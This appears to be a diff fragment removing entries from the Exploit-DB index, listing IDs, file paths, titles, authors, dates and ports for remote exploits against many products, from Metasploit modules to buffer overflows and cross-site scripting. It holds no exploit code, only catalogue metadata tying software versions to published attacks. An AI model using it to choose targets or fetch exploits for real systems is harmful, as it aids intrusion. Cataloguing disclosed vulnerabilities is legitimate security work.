-26529,exploits/multiple/remote/26529.rb,"Java Applet - ProviderSkeleton Insecure Invoke Method (Metasploit)",2013-07-01,Metasploit,multiple,remote, -26531,exploits/multiple/remote/26531.html,"Opera Web Browser 8.0/8.5 - HTML Form Status Bar Misrepresentation",2005-11-16,Sverx,multiple,remote, -26536,exploits/linux/remote/26536.txt,"Qualcomm WorldMail Server 3.0 - Directory Traversal",2005-11-17,FistFuXXer,linux,remote, -26540,exploits/linux/remote/26540.txt,"Inkscape 0.41/0.42 - '.SVG' Image Buffer Overflow",2005-11-21,"Joxean Koret",linux,remote, -26542,exploits/multiple/remote/26542.txt,"Apache Struts 1.2.7 - Error Response Cross-Site Scripting",2005-11-21,"Irene Abezgauz",multiple,remote, -26622,exploits/php/remote/26622.rb,"InstantCMS 1.6 - PHP Remote Code Execution (Metasploit)",2013-07-05,Metasploit,php,remote, -40386,exploits/hardware/remote/40386.py,"Cisco ASA 9.2(3) - 'EXTRABACON' Authentication Bypass",2016-09-16,"Sean Dillon",hardware,remote,161 -26737,exploits/lin_x86/remote/26737.pl,"Nginx 1.3.9/1.4.0 (x86) - Brute Force",2013-07-11,kingcope,lin_x86,remote, -26739,exploits/windows/remote/26739.py,"Ultra Mini HTTPD 1.21 - Remote Stack Buffer Overflow",2013-07-11,superkojiman,windows,remote,80 -26741,exploits/linux/remote/26741.pl,"Horde IMP 2.2.x/3.2.x/4.0.x - Email Attachments HTML Injection",2005-12-06,"SEC Consult",linux,remote, -26768,exploits/cgi/remote/26768.txt,"ACME Perl-Cal 2.99 - Cal_make.pl Cross-Site Scripting",2005-12-08,$um$id,cgi,remote, -26773,exploits/windows/remote/26773.txt,"LogiSphere 0.9.9 j - 'viewsource.jsp?source' Traversal Arbitrary File Access",2005-12-12,dr_insane,windows,remote, -26774,exploits/windows/remote/26774.txt,"LogiSphere 0.9.9 j - 'Search?NS-query-pat' Traversal Arbitrary File Access",2005-12-12,dr_insane,windows,remote, -26775,exploits/windows/remote/26775.txt,"LogiSphere 0.9.9 j - URI Multiple Method Traversal Arbitrary File Access",2005-12-12,dr_insane,windows,remote, -26913,exploits/linux/remote/26913.c,"Info-ZIP UnZip 5.x - File Name Buffer Overflow",2005-12-19,DVDMAN,linux,remote, -26966,exploits/multiple/remote/26966.txt,"httprint 202.0 - HTTP Response Server Field Arbitrary Script Injection",2005-12-22,"Mariano Nunez Di Croce",multiple,remote, -27007,exploits/windows/remote/27007.rb,"PCMan FTP Server 2.0.7 - Remote (Metasploit)",2013-07-22,MSJ,windows,remote,21 -27012,exploits/windows/remote/27012.rb,"Apple QuickTime 7 - Invalid Atom Length Buffer Overflow (Metasploit)",2013-07-22,Metasploit,windows,remote, -27013,exploits/windows/remote/27013.rb,"HP Managed Printing Administration - jobAcct Remote Command Execution (Metasploit)",2013-07-22,Metasploit,windows,remote, -27024,exploits/windows/remote/27024.txt,"EFileGo 3.0 - Multiple Input Validation Vulnerabilities",2006-01-03,dr_insane,windows,remote, -27032,exploits/linux/remote/27032.txt,"Hylafax 4.1/4.2 (Multiple Scripts) - Remote Command Execution",2006-01-05,"Patrice Fournier",linux,remote, -27044,exploits/hardware/remote/27044.rb,"D-Link Devices - UPnP SOAP Command Execution (Metasploit)",2013-07-23,Metasploit,hardware,remote, -27045,exploits/linux/remote/27045.rb,"Foreman (RedHat OpenStack/Satellite) - bookmarks/create Code Injection (Metasploit)",2013-07-23,Metasploit,linux,remote,443 -27046,exploits/windows/remote/27046.rb,"VMware vCenter - Chargeback Manager ImageUploadServlet Arbitrary File Upload (Metasploit)",2013-07-23,Metasploit,windows,remote,443 -27072,exploits/windows/remote/27072.pl,"Microsoft Visual Studio - UserControl Remote Code Execution (1)",2006-01-12,anonymous,windows,remote, -27073,exploits/windows/remote/27073.txt,"Microsoft Visual Studio - UserControl Remote Code Execution (2)",2006-01-12,priestmaster,windows,remote, -27095,exploits/multiple/remote/27095.txt,"Apache Tomcat / Geronimo 1.0 - 'Sample Script cal2.jsp?time' Cross-Site Scripting",2006-01-16,"Oliver Karow",multiple,remote, -27096,exploits/multiple/remote/27096.txt,"Apache Geronimo 1.0 - Error Page Cross-Site Scripting",2006-01-16,"Oliver Karow",multiple,remote, -27133,exploits/linux_mips/remote/27133.py,"ASUS RT-AC66U - 'acsd' Remote Command Execution",2013-07-27,"Jacob Holcomb",linux_mips,remote, -27135,exploits/multiple/remote/27135.rb,"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (Metasploit)",2013-07-27,Metasploit,multiple,remote,8080 -27150,exploits/linux/remote/27150.txt,"Mozilla Firefox 1.0/1.5 XBL - MOZ-BINDING Property Cross-Domain Scripting",2006-01-30,"Chris Thomas",linux,remote, -27181,exploits/multiple/remote/27181.txt,"IBM Lotus Domino 6.x/7.0 - iNotes JavaScript: Filter Bypass",2006-02-10,"Jakob Balle",multiple,remote, -27182,exploits/multiple/remote/27182.txt,"IBM Lotus Domino 6.x/7.0 iNotes - Email Subject Cross-Site Scripting",2006-02-10,"Jakob Balle",multiple,remote, -27203,exploits/hardware/remote/27203.pl,"Fortinet Fortigate 2.x/3.0 - URL Filtering Bypass",2006-02-13,"Mathieu Dessus",hardware,remote, -27233,exploits/linux/remote/27233.txt,"SAP Business Connector 4.6/4.7 - 'chopSAPLog.dsp?fullName' Arbitrary File Disclosure",2006-02-15,"Leandro Meiners",linux,remote, -27234,exploits/linux/remote/27234.txt,"SAP Business Connector 4.6/4.7 - 'deleteSingle?fullName' Arbitrary File Deletion",2006-02-15,"Leandro Meiners",linux,remote, -27235,exploits/linux/remote/27235.txt,"SAP Business Connector 4.6/4.7 - 'adapter-index.dsp?url' Arbitrary Site Redirect",2006-02-15,"Leandro Meiners",linux,remote, -27244,exploits/linux/remote/27244.txt,"Wimpy MP3 Player 5 - Text File Overwrite",2006-02-16,ReZEN,linux,remote, -27271,exploits/windows/remote/27271.rb,"HP Data Protector - CMD Install Service (Metasploit)",2013-08-02,"Ben Turner",windows,remote, -27277,exploits/windows/remote/27277.py,"PCMan FTP Server 2.07 - 'PASS' Remote Buffer Overflow",2013-08-02,Ottomatik,windows,remote, -27528,exploits/hardware/remote/27528.rb,"D-Link Devices - 'command.php' Unauthenticated Remote Command Execution (Metasploit)",2013-08-12,Metasploit,hardware,remote, -27293,exploits/php/remote/27293.rb,"PineApp Mail-SeCure - 'test_li_connection.php' Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,php,remote,7443 -27294,exploits/php/remote/27294.rb,"PineApp Mail-SeCure - 'ldapsyncnow.php' Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,php,remote,7443 -27295,exploits/unix/remote/27295.rb,"PineApp Mail-SeCure - livelog.html Arbitrary Command Execution (Metasploit)",2013-08-02,Metasploit,unix,remote,7443 -27319,exploits/hardware/remote/27319.txt,"Thomson SpeedTouch 500 Series - NewUser Function 31 Variable Persistent User Creation",2006-02-25,"Preben Nylokken",hardware,remote, -27325,exploits/windows/remote/27325.txt,"DirectContact 0.3.b - Directory Traversal",2006-02-27,"Donato Ferrante",windows,remote, -27326,exploits/linux/remote/27326.txt,"MySQL 5.0.18 - Query Logging Bypass",2006-02-27,1dt.w0lf,linux,remote, -27378,exploits/windows/remote/27378.txt,"Easy File Sharing Web Server 3.2 - Full Path Request Arbitrary File Upload",2006-03-09,"Revnic Vasile",windows,remote, -27397,exploits/linux/remote/27397.txt,"Apache suEXEC - Information Disclosure / Privilege Escalation",2013-08-07,kingcope,linux,remote, -27400,exploits/windows/remote/27400.py,"HP Data Protector - Remote Command Execution",2013-08-07,"Alessandro Di Pinto & Claudio Moletta",windows,remote, -27401,exploits/windows/remote/27401.py,"(Gabriel's FTP Server) Open & Compact FTP Server 1.2 - Authentication Bypass / Directory Traversal SAM Retrieval",2013-08-07,Wireghoul,windows,remote, -27428,exploits/hardware/remote/27428.rb,"D-Link Devices - 'tools_vct.xgi' Unauthenticated Remote Command Execution (Metasploit)",2013-08-08,Metasploit,hardware,remote, -27429,exploits/windows/remote/27429.rb,"Mozilla Firefox - onreadystatechange Event DocumentViewerImpl Use-After-Free (Metasploit)",2013-08-08,Metasploit,windows,remote, -27452,exploits/hardware/remote/27452.txt,"F5 Firepass 4100 SSL VPN - Cross-Site Scripting",2006-03-21,"ILION Research",hardware,remote, -27508,exploits/php/remote/27508.txt,"PHP 4.x/5.x - 'Html_Entity_Decode()' Information Disclosure",2006-03-29,Samuel,php,remote, -27523,exploits/windows/remote/27523.py,"Sami FTP Server 2.0.1 - MKD Buffer Overflow ASLR Bypass (SEH)",2013-08-12,Polunchis,windows,remote,21 -27526,exploits/windows/remote/27526.txt,"Oracle Java - 'storeImageArray()' Invalid Array Indexing",2013-08-12,"Packet Storm",windows,remote, -27527,exploits/multiple/remote/27527.rb,"Ruby on Rails - Known Secret Session Cookie Remote Code Execution (Metasploit)",2013-08-12,Metasploit,multiple,remote, -27529,exploits/php/remote/27529.rb,"OpenX - Backdoor PHP Code Execution (Metasploit)",2013-08-12,Metasploit,php,remote, -27530,exploits/multiple/remote/27530.rb,"Squash - YAML Code Execution (Metasploit)",2013-08-12,Metasploit,multiple,remote, -27554,exploits/windows/remote/27554.py,"MinaliC WebServer 2.0.0 - Remote Buffer Overflow (Egghunter)",2013-08-13,PuN1sh3r,windows,remote,8080 -27555,exploits/windows/remote/27555.rb,"HP StorageWorks P4000 Virtual SAN Appliance - Login Buffer Overflow (Metasploit)",2013-08-13,Metasploit,windows,remote,13838 -27556,exploits/windows/remote/27556.rb,"Open-FTPD 1.2 - Arbitrary File Upload (Metasploit)",2013-08-13,Metasploit,windows,remote,8080 -27564,exploits/php/remote/27564.txt,"PHP 4.x/5.0/5.1 - PHPInfo Large Input Cross-Site Scripting",2006-04-03,"Maksymilian Arciemowicz",php,remote, -27565,exploits/windows/remote/27565.txt,"HP Color LaserJet 2500/4600 Toolbox - Directory Traversal",2006-04-03,"Richard Horsman",windows,remote, -27568,exploits/windows/remote/27568.py,"UltraVNC 1.0.1 - Multiple Remote Error Logging Buffer Overflow Vulnerabilities (1)",2006-04-04,"Luigi Auriemma",windows,remote, -27569,exploits/windows/remote/27569.txt,"UltraVNC 1.0.1 - Multiple Remote Error Logging Buffer Overflow Vulnerabilities (2)",2006-04-04,"Luigi Auriemma",windows,remote, -27577,exploits/windows/remote/27577.txt,"Microsoft Internet Explorer 5 - Address Bar Spoofing",2006-04-03,"Hai Nam Luke",windows,remote, -27595,exploits/php/remote/27595.txt,"PHP 4.x - 'tempnam() open_basedir' Restriction Bypass",2006-04-10,"Maksymilian Arciemowicz",php,remote, -27596,exploits/php/remote/27596.txt,"PHP 4.x - 'copy() Safe_Mode' Bypass",2006-04-10,"Maksymilian Arciemowicz",php,remote, -27806,exploits/windows/remote/27806.txt,"BankTown ActiveX Control 1.4.2.51817/1.5.2.50209 - Remote Buffer Overflow",2006-05-03,"Gyu Tae",windows,remote, -27606,exploits/windows/remote/27606.rb,"Intrasrv 1.0 - Remote Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,remote,80 -27607,exploits/windows/remote/27607.rb,"MiniWeb 300 - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,windows,remote,8000 -27608,exploits/windows/remote/27608.rb,"Ultra Mini HTTPD - Remote Stack Buffer Overflow (Metasploit)",2013-08-15,Metasploit,windows,remote,80 -27610,exploits/php/remote/27610.rb,"Joomla! Component Media Manager - Arbitrary File Upload (Metasploit)",2013-08-15,Metasploit,php,remote,80 -27611,exploits/windows/remote/27611.txt,"Oracle Java - 'IntegerInterleavedRaster.verify()' Signed Integer Overflow",2013-08-15,"Packet Storm",windows,remote, -27627,exploits/windows/remote/27627.txt,"Saxopress - 'URL' Directory Traversal",2006-04-11,SecuriTeam,windows,remote, -27630,exploits/linux/remote/27630.txt,"Plone 2.x - MembershipTool Access Control Bypass",2006-04-12,MJ0011,linux,remote, -27636,exploits/multiple/remote/27636.txt,"Adobe Document Server 6.0 Extensions - 'ads-readerext?actionID' Cross-Site Scripting",2006-04-13,"Tan Chew Keong",multiple,remote, -27637,exploits/multiple/remote/27637.txt,"Adobe Document Server 6.0 Extensions - 'AlterCast?op' Cross-Site Scripting",2006-04-13,"Tan Chew Keong",multiple,remote, -28056,exploits/hardware/remote/28056.txt,"Mikrotik RouterOS sshd (ROSSSH) - Unauthenticated Remote Heap Corruption",2013-09-03,kingcope,hardware,remote, -27703,exploits/windows/remote/27703.py,"PCMan FTP Server 2.07 - 'STOR' Remote Buffer Overflow",2013-08-19,Polunchis,windows,remote, -27704,exploits/windows/remote/27704.rb,"Cogent DataHub - HTTP Server Buffer Overflow (Metasploit)",2013-08-19,Metasploit,windows,remote, -27705,exploits/multiple/remote/27705.rb,"Java - 'storeImageArray()' Invalid Array Indexing (Metasploit)",2013-08-19,Metasploit,multiple,remote, -27706,exploits/hardware/remote/27706.txt,"IBM 1754 GCM 1.18.0.22011 - Remote Command Execution",2013-08-19,"Alejandro Alvarez Bravo",hardware,remote, -27716,exploits/multiple/remote/27716.txt,"Asterisk Recording Interface 0.7.15 - 'Audio.php' Information Disclosure",2006-04-21,"Francois Harvey",multiple,remote, -27744,exploits/windows/remote/27744.html,"Microsoft Internet Explorer 5.0.1 - Modal Dialog Manipulation",2006-04-26,"Matthew Murphy",windows,remote, -27746,exploits/windows/remote/27746.txt,"winiso 5.3 - Directory Traversal",2006-04-28,Sowhat,windows,remote, -27747,exploits/windows/remote/27747.pl,"freeFTPd 1.0.10 - 'PASS' Remote Buffer Overflow (SEH)",2013-08-21,Wireghoul,windows,remote,21 -27752,exploits/unix/remote/27752.rb,"Graphite Web - Unsafe Pickle Handling (Metasploit)",2013-08-21,Metasploit,unix,remote, -27754,exploits/windows/remote/27754.txt,"Oracle Java - 'BytePackedRaster.verify()' Signed Integer Overflow",2013-08-21,"Packet Storm",windows,remote, -27758,exploits/windows/remote/27758.txt,"ezb systems ultraiso 8.0.1392 - Directory Traversal",2006-04-28,Sowhat,windows,remote, -27759,exploits/windows/remote/27759.txt,"magiciso 5.0 build 0166 - Directory Traversal",2006-04-28,Sowhat,windows,remote, -27760,exploits/windows/remote/27760.txt,"poweriso 2.9 - Directory Traversal",2006-04-28,Sowhat,windows,remote, -27801,exploits/linux/remote/27801.txt,"Quagga Routing Software Suite 0.9x - RIPd RIPv1 Request Routing Table Disclosure",2006-05-03,"Konstantin V. Gavrilenko",linux,remote, -27802,exploits/linux/remote/27802.txt,"Quagga Routing Software Suite 0.9x - RIPd RIPv1 RESPONSE Packet Route Injection",2006-05-03,"Konstantin V. Gavrilenko",linux,remote, -27805,exploits/windows/remote/27805.py,"dreamMail e-mail client 4.6.9.2 - Persistent Cross-Site Scripting",2013-08-23,loneferret,windows,remote, -27820,exploits/windows/remote/27820.txt,"Cryptomathic - ActiveX Control Remote Buffer Overflow",2006-05-05,"Dennis Rand",windows,remote, -27830,exploits/hardware/remote/27830.java,"Cisco - WebSense Content Filtering Bypass",2006-05-08,"George D. Gal",hardware,remote, -33405,exploits/multiple/remote/33405.txt,"APC Network Management Card - Cross-Site Request Forgery / Cross-Site Scripting",2009-12-15,"Jamal Pecou",multiple,remote, -27851,exploits/windows/remote/27851.bat,"Microsoft Windows - Path Conversion",2006-05-10,"Mario Ballano Bárcena",windows,remote, -27852,exploits/multiple/remote/27852.pl,"Symantec Enterprise Firewall / Gateway Security - HTTP Proxy Internal IP Leakage",2006-05-10,"Bernhard Mueller",multiple,remote, -27861,exploits/asp/remote/27861.txt,"Ipswitch WhatsUp Professional 2006 - '/NmConsole/Navigation.asp?sDeviceView' Cross-Site Scripting",2006-05-12,"David Maciejak",asp,remote, -27862,exploits/asp/remote/27862.txt,"Ipswitch WhatsUp Professional 2006 - '/NmConsole/ToolResults.asp?sHostname' Cross-Site Scripting",2006-05-12,"David Maciejak",asp,remote, -27873,exploits/hardware/remote/27873.txt,"Belkin G Wireless Router Firmware 5.00.12 - Remote Code Execution (PoC)",2013-08-26,Aodrulez,hardware,remote, -27877,exploits/windows/remote/27877.rb,"Oracle Endeca Server - Remote Command Execution (Metasploit)",2013-08-26,Metasploit,windows,remote,7770 -27887,exploits/multiple/remote/27887.txt,"SAP Web Application Server 6.x/7.0 - Input Validation",2005-11-09,"Arnold Grossmann",multiple,remote, -27891,exploits/hardware/remote/27891.txt,"Ipswitch WhatsUp Professional 2006 - Authentication Bypass",2006-05-17,"Kenneth F. Belva",hardware,remote, -27892,exploits/hardware/remote/27892.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - help Script Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote, -27893,exploits/hardware/remote/27893.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - 'events.tar?source_ip' Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote, -40382,exploits/multiple/remote/40382.txt,"Apache Mina 2.0.13 - Remote Command Execution",2016-09-14,"Gregory Draperi",multiple,remote, -27894,exploits/hardware/remote/27894.txt,"obotix IP Camera M1 1.9.4 .7/M10 2.0.5.2 - 'eventplayer?get_image_info_abspath' Cross-Site Scripting",2006-05-17,"Jaime Blasco",hardware,remote, -27902,exploits/linux/remote/27902.txt,"Prodder 0.4 - Arbitrary Shell Command Execution",2006-05-22,"RedTeam Pentesting",linux,remote, -27923,exploits/hardware/remote/27923.txt,"D-Link Airspot DSA-3100 Gateway - 'Login_error.SHTML' Cross-Site Scripting",2006-05-30,"Jaime Blasco",hardware,remote, -27931,exploits/multiple/remote/27931.txt,"Snort 2.4.x - URIContent Rules Detection Evasion",2006-05-31,"Blake Hartstein",multiple,remote, -27939,exploits/windows/remote/27939.rb,"HP LoadRunner - lrFileIOService ActiveX Remote Code Execution (Metasploit)",2013-08-29,Metasploit,windows,remote, -27940,exploits/windows/remote/27940.rb,"Mozilla Firefox - XMLSerializer Use-After-Free (Metasploit)",2013-08-29,Metasploit,windows,remote, -27941,exploits/php/remote/27941.rb,"SPIP - 'connect' PHP Injection (Metasploit)",2013-08-29,Metasploit,php,remote, -27943,exploits/windows/remote/27943.txt,"Oracle Java - ByteComponentRaster.verify() Memory Corruption",2013-08-29,"Packet Storm",windows,remote, -27992,exploits/unix/remote/27992.txt,"FreeType - '.TTF' File Remote Buffer Overflow",2006-06-08,"Josh Bressers",unix,remote, -27984,exploits/windows/remote/27984.txt,"Microsoft DXImageTransform.Microsoft.Light - ActiveX Control Remote Code Execution",2006-06-13,"Will Dormann",windows,remote, -27986,exploits/windows/remote/27986.html,"Microsoft Internet Explorer 5.5/6.0/7.0 - JavaScript Key Filtering",2006-06-06,"Jesse Ruderman",windows,remote, -27987,exploits/linux/remote/27987.html,"Mozilla Firefox 1.x - JavaScript Key Filtering",2006-06-06,"Jesse Ruderman",linux,remote, -28005,exploits/windows/remote/28005.pl,"Microsoft Exchange Server 2000/2003 - Outlook Web Access Script Injection",2006-06-13,"Daniel Fabian",windows,remote, -28007,exploits/windows/remote/28007.txt,"WinSCP 3.8.1 - URI Handler Arbitrary File Access",2006-06-12,"Jelmer Kuperus",windows,remote, -28030,exploits/unix/remote/28030.txt,"Cisco Secure ACS 2.3 - 'LoginProxy.cgi' Cross-Site Scripting",2006-06-15,"Thomas Liam Romanis",unix,remote, -28081,exploits/ios/remote/28081.txt,"Apple Safari 6.0.1 for iOS 6.0 / Apple Mac OSX 10.7/8 - Heap Buffer Overflow",2013-09-04,"Vitaliy Toropov",ios,remote, -28082,exploits/windows/remote/28082.rb,"Microsoft Internet Explorer - CFlatMarkupPointer Use-After-Free (MS13-059) (Metasploit)",2013-09-04,Metasploit,windows,remote, -28083,exploits/windows/remote/28083.rb,"HP LoadRunner - lrFileIOService ActiveX WriteFileString Remote Code Execution (Metasploit)",2013-09-04,Metasploit,windows,remote, -28118,exploits/windows/remote/28118.html,"Microsoft Internet Explorer 5.0.1 - OuterHTML redirection Handling Information Disclosure",2006-06-27,"Plebo Aesdi Nael",windows,remote, -28170,exploits/windows/remote/28170.rb,"freeFTPd 1.0.10 - 'PASS' Remote Buffer Overflow (SEH) (Metasploit)",2013-09-09,"Muhamad Fadzil Ramli",windows,remote,21 -28181,exploits/linux/remote/28181.c,"AdPlug 2.0 - Multiple Remote File Buffer Overflow Vulnerabilities",2006-07-06,"Luigi Auriemma",linux,remote, -28183,exploits/windows/remote/28183.py,"eM Client e-mail client 5.0.18025.0 - Persistent Cross-Site Scripting",2013-09-10,loneferret,windows,remote, -28186,exploits/windows/remote/28186.c,"Kaillera 0.86 - Message Buffer Overflow",2006-07-06,"Luigi Auriemma",windows,remote, -28187,exploits/windows/remote/28187.rb,"Microsoft Internet Explorer - CAnchorElement Use-After-Free (MS13-055) (Metasploit)",2013-09-10,Metasploit,windows,remote, -28188,exploits/windows/remote/28188.rb,"HP SiteScope (Windows) - Remote Code Execution (Metasploit)",2013-09-10,Metasploit,windows,remote,8080 -28189,exploits/windows/remote/28189.txt,"Microsoft Excel 2000-2004 - Style Handling and Repair Remote Code Execution",2006-07-06,Nanika,windows,remote, -28198,exploits/windows/remote/28198.py,"Microsoft Office 2000/2002 - Property Code Execution",2006-07-11,anonymous,windows,remote, -28209,exploits/multiple/remote/28209.txt,"FLV Players 8 - 'player.php?url' Cross-Site Scripting",2006-07-12,xzerox,multiple,remote, -28210,exploits/multiple/remote/28210.txt,"FLV Players 8 - 'popup.php?url' Cross-Site Scripting",2006-07-12,xzerox,multiple,remote, -28224,exploits/windows/remote/28224.c,"Microsoft PowerPoint 2003 - 'mso.dll' '.PPT' Processing Code Execution",2006-07-14,"naveed afzal",windows,remote, -28225,exploits/windows/remote/28225.c,"Microsoft PowerPoint 2003 - 'powerpnt.exe' Remote Overflow",2006-07-14,"naveed afzal",windows,remote, -28226,exploits/windows/remote/28226.c,"Microsoft PowerPoint 2003 - '.ppt' File Closure Memory Corruption",2006-07-14,"naveed afzal",windows,remote, -28235,exploits/windows/remote/28235.c,"RARLAB WinRAR 3.x - LHA Filename Handling Buffer Overflow",2006-07-18,"Ryan Smith",windows,remote, -28245,exploits/hardware/remote/28245.pl,"Cisco Security Monitoring Analysis and Response System JBoss - Command Execution",2006-07-19,"Jon Hart",hardware,remote, -28254,exploits/multiple/remote/28254.txt,"Apache Tomcat 5 - Information Disclosure",2006-07-21,"ScanAlert Security",multiple,remote, -28284,exploits/windows/remote/28284.html,"Mitsubishi MC-WorkX 8.02 - ActiveX Control 'IcoLaunch' File Execution",2013-09-15,blake,windows,remote, -28298,exploits/windows/remote/28298.txt,"Yahoo! Messenger 7.0/7.5 - Remote Search String Arbitrary Browser Navigation",2006-07-28,"Ivan Ivan",windows,remote, -28312,exploits/multiple/remote/28312.txt,"VMware ESX 2.x - Multiple Information Disclosure Vulnerabilities",2006-07-31,"Stephen de Vries",multiple,remote, -28314,exploits/linux/remote/28314.c,"BomberClone 0.11 - Multiple Vulnerabilities",2006-07-31,"Luigi Auriemma",linux,remote, -28328,exploits/windows/remote/28328.rb,"PCMan FTP Server 2.07 - 'STOR' Remote Stack Overflow (Metasploit)",2013-09-17,"Rick Flores",windows,remote,21 -28331,exploits/windows/remote/28331.txt,"Oracle Java - 'ShortComponentRaster.verify()' Memory Corruption",2013-09-17,"Packet Storm",windows,remote, -28333,exploits/unix/remote/28333.rb,"D-Link Devices - UPnP SOAP TelnetD Command Execution (Metasploit)",2013-09-17,Metasploit,unix,remote,49152 -28334,exploits/linux/remote/28334.rb,"Sophos Web Protection Appliance - 'sblistpack' Arbitrary Command Execution (Metasploit)",2013-09-17,Metasploit,linux,remote,443 -28336,exploits/windows/remote/28336.rb,"HP ProCurve Manager - SNAC UpdateDomainControllerServlet Arbitrary File Upload (Metasploit)",2013-09-17,Metasploit,windows,remote,443 -28337,exploits/windows/remote/28337.rb,"HP ProCurve Manager SNAC - UpdateCertificatesServlet Arbitrary File Upload (Metasploit)",2013-09-17,Metasploit,windows,remote,443 -28344,exploits/multiple/remote/28344.txt,"DConnect Daemon - Listen Thread UDP Remote Buffer Overflow",2006-08-06,"Luigi Auriemma",multiple,remote, -28357,exploits/windows/remote/28357.asc,"Microsoft Windows XP/2000/2003 - Explorer Drag and Drop Remote Code Execution",2006-07-27,"Plebo Aesdi Nael",windows,remote, -28360,exploits/windows/remote/28360.c,"EasyCafe 2.1/2.2 - Security Restriction Bypass",2006-08-07,"Mobin Yazarlou",windows,remote, -28365,exploits/multiple/remote/28365.txt,"Apache 2.2.2 - CGI Script Source Code Information Disclosure",2006-08-09,"Susam Pal",multiple,remote, -28368,exploits/multiple/remote/28368.txt,"ArcSoft Mms Composer 1.5.5/2.0 - Multiple Vulnerabilities",2006-08-09,"Collin R. Mulliner",multiple,remote, -28373,exploits/windows/remote/28373.txt,"Panda ActiveScan 5.53 - 'Ascan_6.asp' ActiveX Control Cross-Site Scripting",2006-08-10,Lostmon,windows,remote, -28374,exploits/windows/remote/28374.txt,"IPCheck Server Monitor 5.x - Directory Traversal",2006-08-10,"Tassi Raeburn",windows,remote, -28376,exploits/windows/remote/28376.html,"McKesson - ActiveX File/Environmental Variable Enumeration",2013-09-18,blake,windows,remote, -28397,exploits/linux/remote/28397.sh,"GNU BinUtils 2.1x - GAS Buffer Overflow",2006-08-17,"Tavis Ormandy",linux,remote, -28398,exploits/linux/remote/28398.txt,"MySQL 4/5 - SUID Routine Miscalculation Arbitrary DML Statement Execution",2006-08-17,"Michal Prokopiuk",linux,remote, -28400,exploits/windows/remote/28400.html,"Microsoft Internet Explorer 6 - 'TSUserEX.dll' ActiveX Control Memory Corruption",2006-08-17,nop,windows,remote, -28407,exploits/php/remote/28407.rb,"Western Digital Arkeia < 10.0.10 - Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote, -28408,exploits/php/remote/28408.rb,"OpenEMR 4.1.1 Patch 14 - SQL Injection / Privilege Escalation / Remote Code Execution (Metasploit)",2013-09-20,xistence,php,remote, -28424,exploits/linux/remote/28424.txt,"Apache 1.3.35/2.0.58/2.2.2 - Arbitrary HTTP Request Headers Security",2006-08-24,"Thiago Zaninotti",linux,remote, -28438,exploits/windows/remote/28438.html,"Microsoft Internet Explorer 5.0.1 - Daxctle.OCX Spline Method Heap Buffer Overflow",2006-08-28,XSec,windows,remote, -28450,exploits/hardware/remote/28450.py,"FiberHome Modem Router HG-110 - Authentication Bypass To Remote Change DNS Servers",2013-09-22,"Javier Perez",hardware,remote, -28481,exploits/windows/remote/28481.rb,"Microsoft Internet Explorer - CCaret Use-After-Free (MS13-069) (Metasploit)",2013-09-23,Metasploit,windows,remote, -28482,exploits/windows/remote/28482.rb,"Microsoft Windows Theme File Handling - Arbitrary Code Execution (MS13-071) (Metasploit)",2013-09-23,Metasploit,windows,remote, -28483,exploits/php/remote/28483.rb,"GLPI - 'install.php' Remote Command Execution (Metasploit)",2013-09-23,Metasploit,php,remote,80 -28484,exploits/hardware/remote/28484.rb,"Linksys WRT110 - Remote Command Execution (Metasploit)",2013-09-23,Metasploit,hardware,remote, -28489,exploits/windows/remote/28489.txt,"Easy Address Book Web Server 1.2 - Remote Format String",2006-09-04,"Revnic Vasile",windows,remote, -28500,exploits/windows/remote/28500.txt,"Microsoft Indexing Service - Query Validation Cross-Site Scripting",2006-09-12,"Eiji James Yoshida",windows,remote, -28501,exploits/multiple/remote/28501.xml,"Sage 1.3.6 - Input Validation",2006-09-08,pdp,multiple,remote, -28508,exploits/hardware/remote/28508.rb,"Raidsonic NAS Devices - Unauthenticated Remote Command Execution (Metasploit)",2013-09-24,Metasploit,hardware,remote, -28512,exploits/windows/remote/28512.txt,"paul smith computer services vcap Calendar server 1.9 - Directory Traversal",2009-09-12,"securma massine",windows,remote, -28595,exploits/linux/remote/28595.txt,"BusyBox 1.01 - HTTPD Directory Traversal",2006-09-16,bug-finder,linux,remote, -28602,exploits/multiple/remote/28602.txt,"OSU HTTP Server 3.10/3.11 - Multiple Information Disclosure Vulnerabilities",2006-09-19,"Julio Cesar Fort",multiple,remote, -28639,exploits/linux/remote/28639.rb,"Apple QuickTime 7.1.3 PlugIn - Arbitrary Script Execution",2006-09-21,LMH,linux,remote, -28640,exploits/windows/remote/28640.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Web Server Full Path Disclosure",2006-09-21,"Patrick Webster",windows,remote, -28641,exploits/windows/remote/28641.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Arbitrary File Manipulation",2006-09-21,"Patrick Webster",windows,remote, -28642,exploits/windows/remote/28642.txt,"CA eSCC r8/1.0 / eTrust Audit r8/1.5 - Audit Event System Replay Attack",2006-09-21,"Patrick Webster",windows,remote, -28643,exploits/osx/remote/28643.txt,"Apple Mac OSX 10.x - AirPort Wireless Driver Multiple Buffer Overflow Vulnerabilities",2006-09-21,"David Maynor",osx,remote, -28725,exploits/multiple/remote/28725.txt,"SAP Internet Transaction Server 6.10/6.20 - Cross-Site Scripting",2006-09-28,"ILION Research",multiple,remote, -28681,exploits/windows/remote/28681.rb,"freeFTPd 1.0.10 - 'PASS' Remote Buffer Overflow (Metasploit)",2013-10-02,Metasploit,windows,remote,21 -28682,exploits/windows/remote/28682.rb,"Micorosft Internet Explorer - SetMouseCapture Use-After-Free (Metasploit)",2013-10-02,Metasploit,windows,remote, -28710,exploits/osx/remote/28710.txt,"Skype Technologies Skype 1.5 - NSRunAlertPanel Remote Format String",2006-09-26,"Tom Ferris",osx,remote, -28713,exploits/php/remote/28713.php,"Apache Tomcat/JBoss EJBInvokerServlet / JMXInvokerServlet (RMI over HTTP) Marshalled Object - Remote Code Execution",2013-10-04,rgod,php,remote, -28724,exploits/windows/remote/28724.rb,"SIEMENS Solid Edge ST4 SEListCtrlX - ActiveX Remote Code Execution (Metasploit)",2013-10-04,Metasploit,windows,remote, 